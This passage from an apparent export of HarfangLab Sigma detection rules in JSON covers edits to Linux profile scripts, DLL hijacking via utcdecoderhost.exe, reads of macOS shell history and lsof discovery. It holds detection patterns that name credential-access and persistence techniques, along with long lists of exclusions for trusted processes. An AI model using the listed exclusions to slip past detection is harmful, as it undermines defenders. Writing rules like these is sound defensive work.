"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md#atomic-test-1---add-command-to-bash_profile",
"https://attack.mitre.org/techniques/T1546/004/"
],
"name": "t1546_004_user_profile_modified_linux.yml",
"content": "title: User Profile Modified\nid: 7db54556-f600-4f15-a4cb-a45837a6edc6\ndescription: |\n Detects an attempt to modify any of the user profile scripts, .profile, .bash_profile or .bash_login.\n These scripts contain commands for setting environment variables.\n Adversaries can establish persistence by adding a malicious binary path or shell commands to these files.\n It is recommended to analyze the process responsible for the edition of the profile script as well as to investigate the changes made to the files to look for malicious commands by downloading the affected files via a \"Download file\" job.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md#atomic-test-1---add-command-to-bash_profile\n - https://attack.mitre.org/techniques/T1546/004/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n Path:\n - '/root/.profile'\n - '/root/.bash_profile'\n - '/root/.bash_login'\n - '/home/*/.profile'\n - '/home/*/.bash_profile'\n - '/home/*/.bash_login'\n\n selection_misc:\n Kind:\n - 'rename'\n - 'symlink'\n - 'hardlink'\n TargetPath:\n - '/root/.profile'\n - '/root/.bash_profile'\n - '/root/.bash_login'\n - '/home/*/.profile'\n - '/home/*/.bash_profile'\n - '/home/*/.bash_login'\n\n exclusion_common:\n ProcessImage:\n - '/usr/sbin/luserdel'\n - '/usr/sbin/luseradd'\n - '/usr/bin/tar'\n - '/usr/bin/podman'\n - '/usr/bin/rsync'\n\n exclusion_useradd:\n - ProcessImage: '/usr/sbin/useradd'\n - ProcessCommandLine|startswith:\n - '/usr/bin/perl /usr/sbin/adduser '\n - '/usr/bin/perl -T /usr/sbin/adduser '\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/snap/docker/*/bin/dockerd'\n - '/bin/containerd'\n - '/usr/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '/usr/bin/containerd-shim-runc-v2'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_oddjob:\n ProcessImage: '/usr/libexec/oddjob/mkhomedir'\n\n exclusion_yocto:\n ProcessImage|startswith: '/opt/yocto/'\n\n exclusion_mkhomedir:\n ProcessImage:\n - '/usr/sbin/mkhomedir_helper'\n - '/sbin/mkhomedir_helper'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_dnf:\n ProcessCommandLine: '/usr/libexec/platform-python /bin/dnf * distro-sync'\n\n exclusion_edutice:\n ProcessCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_tomcat:\n - ProcessCommandLine|contains: '/opt/tomcat/bin/tomcat-create-instance.ksh'\n - ProcessParentCommandLine|contains: '/opt/tomcat/bin/tomcat-create-instance.ksh'\n\n exclusion_puppet:\n ProcessParentImage|startswith: '/opt/puppetlabs/'\n\n exclusion_siham:\n ProcessImage: '/usr/lib/jvm/*/bin/java'\n ProcessParentCommandLine|contains: '/lanceJava.ksh fr.amue.siham.outils.InstallerPackageClient'\n Path: '/home/hr*/.profile'\n\n exclusion_commandline:\n - ProcessParentCommandLine|contains: 'bash -c . ${HOME}/.bash_profile;cd /var/opt/data/flat/'\n - ProcessGrandparentCommandLine|contains: 'bash -c . ${HOME}/.bash_profile;cd /var/opt/data/flat/'\n\n exclusion_cron:\n ProcessAncestors|endswith: '|/usr/sbin/cron|/lib/systemd/systemd'\n\n exclusion_apt:\n ProcessAncestors|contains: '|/usr/bin/apt-get|'\n\n exclusion_temp_file:\n - ProcessImage: '/usr/bin/sed'\n Path|endswith: '/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath|endswith: '/sed??????'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7db54556-f600-4f15-a4cb-a45837a6edc6",
"rule_name": "User Profile Modified",
"rule_description": "Detects an attempt to modify any of the user profile scripts, .profile, .bash_profile or .bash_login.\nThese scripts contain commands for setting environment variables.\nAdversaries can establish persistence by adding a malicious binary path or shell commands to these files.\nIt is recommended to analyze the process responsible for the edition of the profile script as well as to investigate the changes made to the files to look for malicious commands by downloading the affected files via a \"Download file\" job.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7dc2e5be-5fde-4138-a05f-7237bf36c9d9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600529Z",
"creation_date": "2026-03-23T11:45:34.600532Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600540Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_utcdecoderhost.yml",
"content": "title: DLL Hijacking via utcdecoderhost.exe\nid: 7dc2e5be-5fde-4138-a05f-7237bf36c9d9\ndescription: |\n Detects potential Windows DLL Hijacking via utcdecoderhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'utcdecoderhost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7dc2e5be-5fde-4138-a05f-7237bf36c9d9",
"rule_name": "DLL Hijacking via utcdecoderhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via utcdecoderhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7dfd0c62-de07-4ea0-a8e7-2abe922f07b1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628265Z",
"creation_date": "2026-03-23T11:45:34.628267Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628271Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/003/"
],
"name": "t1552_003_shell_history_read_macos.yml",
"content": "title: Shell History File Read (macOS)\nid: 7dfd0c62-de07-4ea0-a8e7-2abe922f07b1\ndescription: |\n Detects an attempt to read any of the common shell history files.\n Those files contains the most recent commands executed by the user and can be used by an attacker to look for unsecured credentials.\n It is recommended to verify if the process performing the read operation has legitimate reason to do it.\nreferences:\n - https://attack.mitre.org/techniques/T1552/003/\ndate: 2024/06/18\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Path|endswith:\n - '.history'\n - '.bash_history'\n - '.sh_history'\n - '.zsh_history'\n ProcessImage|contains: '?'\n Kind: 'read'\n\n filter_shell:\n ProcessImage|endswith:\n - '/bin/zsh'\n - '/bin/bash'\n - '/bin/sh'\n - '/Applications/Warp.app/Contents/MacOS/stable'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_rider_jetbrains:\n Image:\n - '/Users/*/Applications/Rider*.app/Contents/MacOS/rider'\n - /Applications/Rider*.app/Contents/MacOS/rider\n\n exclusion_cp_shell_sessions:\n Image: '/bin/cp'\n ProcessCommandLine:\n - '/bin/cp /Users/*/.zsh_history /Users/*/.zsh_sessions/*.history'\n - '/bin/cp /Users/*/.bash_history /Users/*/.bash_sessions/*.history'\n\n exclusion_tail_zsh:\n ProcessParentImage: '/bin/zsh'\n ProcessParentCommandLine:\n - '-zsh'\n - '/bin/zsh -il'\n ProcessCommandLine: 'tail -n100 /Users/*/.zsh_history'\n\n exclusion_adobe:\n Image: '/Applications/Adobe Bridge ????/Adobe Bridge ????.app/Contents/MacOS/Adobe Bridge *'\n\n exclusion_phpstorm:\n Image: '/Users/*/Applications/PhpStorm.app/Contents/MacOS/phpstorm'\n\n exclusion_texteditor:\n Image:\n - '/opt/homebrew/Cellar/emacs/*/bin/emacs-*'\n - '/usr/bin/vim'\n\n exclusion_jetbrains:\n ProcessSigned: 'true'\n ProcessSignatureSigningId|startswith: 'com.jetbrains.'\n\n exclusion_memory_cleaner:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.nektony.Memory-Cleaner-SIII'\n\n exclusion_superfile:\n Image: '/opt/homebrew/Cellar/superfile/*/bin/spf'\n\n exclusion_text_editor:\n Image: '/System/Applications/TextEdit.app/Contents/MacOS/TextEdit'\n\n exclusion_copy:\n Image: '/bin/cp'\n ProcessSignatureSigningId: 'com.apple.cp'\n ProcessSigned: 'true'\n\n exclusion_r:\n Image: '/Applications/R.app/Contents/MacOS/R'\n ProcessSignatureSigningId: 'org.R-project.R'\n ProcessSigned: 'true'\n\n exclusion_paloalto:\n Image: '/Library/Application Support/PaloAltoNetworks/Traps/bin/pmd'\n ProcessSignatureSigningId: 'pmd'\n ProcessSigned: 'true'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7dfd0c62-de07-4ea0-a8e7-2abe922f07b1",
"rule_name": "Shell History File Read (macOS)",
"rule_description": "Detects an attempt to read any of the common shell history files.\nThose files contains the most recent commands executed by the user and can be used by an attacker to look for unsecured credentials.\nIt is recommended to verify if the process performing the read operation has legitimate reason to do it.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7e00d26e-2a2d-476a-a23e-27322ed7ad2c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.548171Z",
"creation_date": "2026-03-23T11:45:34.095044Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095048Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man8/lsof.8.html",
"https://attack.mitre.org/techniques/T1049/"
],
"name": "t1049_lsof_linux.yml",
"content": "title: Currently Open Files Listed via Lsof (Linux)\nid: 7e00d26e-2a2d-476a-a23e-27322ed7ad2c\ndescription: |\n Detects the execution of the lsof utility to list all opened files on the system, especially files representing active network connections.\n Attackers may use it during discovery phase to discover remote systems.\n It is recommended to monitor the patterns used with lsof and investigate other discovery alerts to determine if this is malicious activity.\nreferences:\n - https://man7.org/linux/man-pages/man8/lsof.8.html\n - https://attack.mitre.org/techniques/T1049/\ndate: 2022/12/23\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/lsof'\n CommandLine:\n - 'lsof'\n - 'lsof -i'\n # Filter-out missing parents\n ParentImage|contains: '?'\n\n exclusion_commandline:\n ParentCommandLine|startswith:\n - '/bin/sh -c lsof | awk '\n - 'sh -c lsof 2>/dev/null | grep /home/'\n - '/bin/ksh /opt/tomcat/*.ksh '\n - '/bin/bash /opt/tomcat/*.ksh '\n - '/bin/bash /tmp/apache/*.ksh '\n - '/bin/ksh /opt/apache/*.ksh '\n - '/bin/bash /opt/apache/*.ksh '\n\n exclusion_insights:\n ParentImage: '/usr/bin/timeout'\n GrandparentCommandLine:\n - '/usr/bin/python /bin/redhat-access-insights --quiet'\n - 'python -m insights.tools.cat --no-header httpd_on_nfs'\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py --retry 3'\n\n exclusion_nuagent:\n ParentImage: '/opt/ds_agent/nuagent/ds_nuagent'\n\n exclusion_rapid7:\n ParentCommandLine|startswith: \"/bin/bash -c echo 'Rapid7Echo'; (LANG=C;LANGUAGE=\"\n\n # https://github.com/ansible/awx\n exclusion_ansibleawx:\n User: 'ansibleawx'\n GrandparentCommandLine: 'sshd: ansibleawx@notty'\n\n # template_exclusion_ansible:\n\n exclusion_ansible_current_directory:\n CurrentDirectory:\n - '/home/ansible/'\n - '/root/.ansible/tmp/'\n\n exclusion_qualys:\n Ancestors|contains:\n - '|/usr/local/qualys/cloud-agent/bin/qualys-scan-util|'\n - '|/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent|'\n\n exclusion_udascan:\n GrandparentImage: '/opt/microfocus/Discovery/.discagnt/udscan'\n\n exclusion_mdatp:\n - User: 'mdatp'\n CurrentDirectory: '/opt/microsoft/mdatp/sbin/'\n - ParentImage: '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - ParentCommandLine|contains: '/opt/microsoft/mdatp/conf/scripts/open_files.py'\n - GrandparentImage: '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - GrandparentCommandLine|contains: '/opt/microsoft/mdatp/conf/scripts/open_files.py'\n\n exclusion_oracle_ahf_tfa:\n ParentImage: '/opt/oracle.ahf/jre/bin/java'\n ParentCommandLine|contains: 'oracle.rat.tfa.TFAMain /opt/oracle.ahf/tfa'\n\n exclusion_oracle_diagsnap:\n ParentImage:\n - '/usr/bin/bash'\n - '/bin/sh'\n # /u01/app/grid/19.9.0.0/perl/bin/perl /u01/app/grid/19.9.0.0/bin/diagsnap.pl start\n GrandparentImage|endswith: '/perl/bin/perl'\n GrandparentCommandLine|contains: '/bin/diagsnap.pl'\n\n exclusion_lynis:\n ParentCommandLine:\n - '/bin/sh ./lynis audit system'\n - '/bin/sh /usr/bin/lynis audit system --cronjob'\n - '/bin/sh /usr/sbin/lynis --quick --no-colors*'\n\n exclusion_insights_client:\n - ParentCommandLine|startswith:\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py '\n - '/usr/bin/python /usr/lib/python*/site-packages/insights_client/run.py '\n - GrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py '\n - '/usr/bin/python /usr/lib/python*/site-packages/insights_client/run.py '\n\n exclusion_sosreport:\n - GrandparentCommandLine: '/usr/bin/python /usr/sbin/sosreport'\n - GrandparentCommandLine|startswith: '/usr/bin/python /usr/sbin/sosreport '\n\n exclusion_rkhunter:\n - ProcessParentCommandLine|contains:\n - '/usr/bin/rkhunter '\n - '/bin/sh /etc/cron.daily/rkhunter'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/rkhunter '\n\n exclusion_fsecure:\n - ProcessParentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n\n exclusion_ninjarmmagent:\n ProcessParentImage: '/opt/ninjarmmagent/programfiles/ninjarmm-linagent'\n\n exclusion_manageengine:\n ParentImage:\n - '/usr/local/manageengine/uems_agent/bin/dcconfig'\n - '/usr/local/manageengine/uems_agent/bin/dcpatchscan'\n\n exclusion_zabbix:\n - Ancestors|contains: '/usr/sbin/zabbix_agentd'\n - GrandparentImage: '/usr/sbin/zabbix_agent2'\n\n exclusion_veeam:\n ParentImage:\n - '/opt/veeam/transport/veeamtransport'\n - '/opt/veeam/deployment/veeamdeploymentsvc'\n\n exclusion_veritas:\n Ancestors|contains: '|/opt/VRTSvcs/bin/Application/ApplicationAgent|'\n\n exclusion_jumpcloud:\n ParentImage: '/opt/jc/bin/jumpcloud-agent'\n\n exclusion_xymon:\n Ancestors|contains: '|/usr/lib/xymon/client/bin/xymonlaunch|'\n\n exclusion_munin:\n GrandparentCommandLine|startswith: '/usr/bin/perl -w /etc/munin/plugins/'\n\n exclusion_nagios:\n Ancestors|contains:\n - '|/usr/sbin/nrpe|'\n - '|/opt/nagiosagent/*/perl/bin/perl|'\n\n exclusion_bladelogic:\n ProcessGrandparentImage:\n - '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n - '/opt/bladelogic/*/NSH/bin/rscd_full'\n\n exclusion_cursor:\n Ancestors|contains: '|/tmp/.mount_Cursor*/usr/share/cursor/cursor|/'\n\n exclusion_container:\n Ancestors|contains: '|/usr/bin/containerd-shim-runc-v2|'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7e00d26e-2a2d-476a-a23e-27322ed7ad2c",
"rule_name": "Currently Open Files Listed via Lsof (Linux)",
"rule_description": "Detects the execution of the lsof utility to list all opened files on the system, especially files representing active network connections.\nAttackers may use it during discovery phase to discover remote systems.\nIt is recommended to monitor the patterns used with lsof and investigate other discovery alerts to determine if this is malicious activity.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-03-20",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7e0790b6-dbc2-4252-bd87-d553bb718f71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610260Z",
"creation_date": "2026-03-23T11:45:34.610263Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610270Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/"
],
"name": "t1548_windir_environment_variable_modification.yml",
